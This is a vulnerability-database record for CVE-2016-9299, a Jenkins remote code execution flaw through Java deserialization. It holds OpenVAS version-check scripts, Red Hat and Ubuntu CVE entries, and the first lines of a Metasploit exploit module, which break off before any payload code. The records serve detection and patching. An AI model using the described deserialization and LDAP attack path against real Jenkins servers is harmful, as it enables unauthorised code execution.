Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Windows)

2017-01-30T00:00:00

Description

This host is installed with Jenkins and is prone to a remote code execution vulnerability.

{"id": "OPENVAS:1361412562310108062", "type": "openvas", "bulletinFamily": "scanner", "title": "Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Windows)", "description": "This host is installed with Jenkins and is prone to\n a remote code execution vulnerability.", "published": "2017-01-30T00:00:00", "modified": "2019-10-17T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108062", "reporter": "Copyright (c) 2017 Greenbone Networks GmbH", "references": ["http://www.securityfocus.com/bid/94281", "https://jenkins.io/security/advisory/2016-11-16/"], "cvelist": ["CVE-2016-9299"], "lastseen": "2019-10-18T15:17:20", "viewCount": 33, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-9299"]}, {"type": "fedora", "idList": ["FEDORA:00FE3602E41B", "FEDORA:ACB376074FEE", "FEDORA:CCC6D6078F5C", "FEDORA:E7173602E415"]}, {"type": "freebsd", "idList": ["27EEE66D-9474-44A5-B830-21EC12A1C307"]}, {"type": "github", "idList": ["GHSA-2X9H-H3C4-WQQH"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634"]}, {"type": "mageia", "idList": ["MGASA-2016-0406"]}, {"type": "myhack58", "idList": ["MYHACK58:62201783274"]}, {"type": "nessus", "idList": ["FEDORA_2016-368780879D.NASL", "FEDORA_2016-93679A91DF.NASL", "FREEBSD_PKG_27EEE66D947444A5B83021EC12A1C307.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108063", "OPENVAS:1361412562310871954", "OPENVAS:1361412562310872082", "OPENVAS:1361412562310872442", "OPENVAS:1361412562310872446"]}, {"type": "osv", "idList": ["OSV:GHSA-2X9H-H3C4-WQQH"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147665"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-9299"]}, {"type": "seebug", "idList": ["SSV:92557"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-9299"]}, {"type": "zdt", "idList": ["1337DAY-ID-30370"]}]}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "fedora", "idList": ["FEDORA:E7173602E415"]}, {"type": "freebsd", "idList": ["27EEE66D-9474-44A5-B830-21EC12A1C307"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/MISC/JENKINS_LDAP_DESERIALIZE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201783274"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_27EEE66D947444A5B83021EC12A1C307.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310872442"]}, {"type": "seebug", "idList": ["SSV:92557"]}, {"type": "zdt", "idList": ["1337DAY-ID-30370"]}]}, "exploitation": null, "vulnersScore": 0.2}, "pluginID": "1361412562310108062", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108062\");\n script_version(\"2019-10-17T11:27:19+0000\");\n script_cve_id(\"CVE-2016-9299\");\n script_bugtraq_id(94281);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-01-30 13:00:00 +0100 (Mon, 30 Jan 2017)\");\n\n script_name(\"Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2016-11-16/\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/94281\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Jenkins and is prone to\n a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an Jenkins allowing to transfer a serialized Java object to the Jenkins CLI,\n making Jenkins connect to an attacker-controlled LDAP server, which in turn can send a serialized payload leading\n to code execution, bypassing existing protection mechanisms.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary code in the context of\n the affected application. Failed exploits will result in denial-of-service conditions.\");\n\n script_tag(name:\"affected\", value:\"Jenkins LTS 2.19.2 and prior, Jenkins 2.31 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Jenkins to 2.32 or later / Jenkins LTS to 2.19.3 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit(0);\n\nif( ! infos = get_app_full( cpe:CPE, port:port ) )\n exit(0);\n\nif( ! version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif( get_kb_item( \"jenkins/\" + port + \"/is_lts\" ) ) {\n if( version_is_less( version:version, test_version:\"2.19.3\" ) ) {\n vuln = TRUE;\n fix = \"2.19.3\";\n }\n} else {\n if( version_is_less( version:version, test_version:\"2.32\" ) ) {\n vuln = TRUE;\n fix = \"2.32\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:version, fixed_version:fix, install_path:location );\n security_message( port:port, data:report, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );\n", "naslFamily": "Web application abuses", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659988328, "score": 1659977468}, "_internal": {"score_hash": "31ff72d3172236302aab528e19c8c162"}}

{"openvas": [{"lastseen": "2019-05-29T18:35:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for jenkins FEDORA-2016-368780879d", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310871954", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871954", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for jenkins FEDORA-2016-368780879d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871954\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:21:40 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-9299\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for jenkins FEDORA-2016-368780879d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jenkins'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"jenkins on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-368780879d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QFJT3TVJVZH5CAVZOY7CPBY3DK7E4CPO\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"jenkins\", rpm:\"jenkins~1.651.3~2.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-18T15:19:23", "description": "This host is installed with Jenkins and is prone to\n a remote code execution vulnerability.", "cvss3": {}, "published": "2017-01-30T00:00:00", "type": "openvas", "title": "Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-10-17T00:00:00", "id": "OPENVAS:1361412562310108063", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108063", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Linux)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108063\");\n script_version(\"2019-10-17T11:27:19+0000\");\n script_cve_id(\"CVE-2016-9299\");\n script_bugtraq_id(94281);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-01-30 13:00:00 +0100 (Mon, 30 Jan 2017)\");\n\n script_name(\"Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2016-11-16/\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/94281\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Jenkins and is prone to\n a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an Jenkins allowing to transfer a serialized Java object to the Jenkins CLI,\n making Jenkins connect to an attacker-controlled LDAP server, which in turn can send a serialized payload leading\n to code execution, bypassing existing protection mechanisms.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary code in the context of\n the affected application. Failed exploits will result in denial-of-service conditions.\");\n\n script_tag(name:\"affected\", value:\"Jenkins LTS 2.19.2 and prior, Jenkins 2.31 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Jenkins to 2.32 or later / Jenkins LTS to 2.19.3 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit(0);\n\nif( ! infos = get_app_full( cpe:CPE, port:port ) )\n exit(0);\n\nif( ! version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif( get_kb_item( \"jenkins/\" + port + \"/is_lts\" ) ) {\n if( version_is_less( version:version, test_version:\"2.19.3\" ) ) {\n vuln = TRUE;\n fix = \"2.19.3\";\n }\n} else {\n if( version_is_less( version:version, test_version:\"2.32\" ) ) {\n vuln = TRUE;\n fix = \"2.32\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:version, fixed_version:fix, install_path:location );\n security_message( port:port, data:report, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:37", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for jenkins-remoting FEDORA-2016-368780879d", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872082", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872082", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for jenkins-remoting FEDORA-2016-368780879d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872082\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:27:04 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-9299\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for jenkins-remoting FEDORA-2016-368780879d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jenkins-remoting'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"jenkins-remoting on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-368780879d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZW2KUKYLNLVDB7STLHLYALCUFLEGCRM6\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"jenkins-remoting\", rpm:\"jenkins-remoting~2.62.3~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:31", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-03-07T00:00:00", "type": "openvas", "title": "Fedora Update for jenkins-remoting FEDORA-2016-93679a91df", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872446", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872446", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for jenkins-remoting FEDORA-2016-93679a91df\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872446\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-07 05:48:14 +0100 (Tue, 07 Mar 2017)\");\n script_cve_id(\"CVE-2016-9299\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for jenkins-remoting FEDORA-2016-93679a91df\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jenkins-remoting'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"jenkins-remoting on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-93679a91df\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XKRLBXFPKTEBV4JI66GC2KQDE3TLZMYR\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"jenkins-remoting\", rpm:\"jenkins-remoting~2.62.3~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:34", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-03-07T00:00:00", "type": "openvas", "title": "Fedora Update for jenkins FEDORA-2016-93679a91df", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872442", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872442", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for jenkins FEDORA-2016-93679a91df\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872442\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-07 05:48:08 +0100 (Tue, 07 Mar 2017)\");\n script_cve_id(\"CVE-2016-9299\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for jenkins FEDORA-2016-93679a91df\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jenkins'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"jenkins on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-93679a91df\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZE7XYOLIPAJFIIPWZPAVZYEAOAT6LHIJ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"jenkins\", rpm:\"jenkins~1.651.3~2.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2021-09-02T22:52:37", "description": "The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.\n#### Mitigation\n\n<https://github.com/jenkinsci-cert/SECURITY-218> \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-15T10:47:41", "type": "redhatcve", "title": "CVE-2016-9299", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2019-10-12T00:55:37", "id": "RH:CVE-2016-9299", "href": "https://access.redhat.com/security/cve/cve-2016-9299", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:06:23", "description": "The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows\nremote attackers to execute arbitrary code via a crafted serialized Java\nobject, which triggers an LDAP query to a third-party server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-12T00:00:00", "type": "ubuntucve", "title": "CVE-2016-9299", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2017-01-12T00:00:00", "id": "UB:CVE-2016-9299", "href": "https://ubuntu.com/security/CVE-2016-9299", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-05-18T18:37:19", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2018-05-18T00:00:00", "type": "zdt", "title": "Jenkins CLI - HTTP Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2018-05-18T00:00:00", "id": "1337DAY-ID-30370", "href": "https://0day.today/exploit/description/30370", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n STAGE1 = 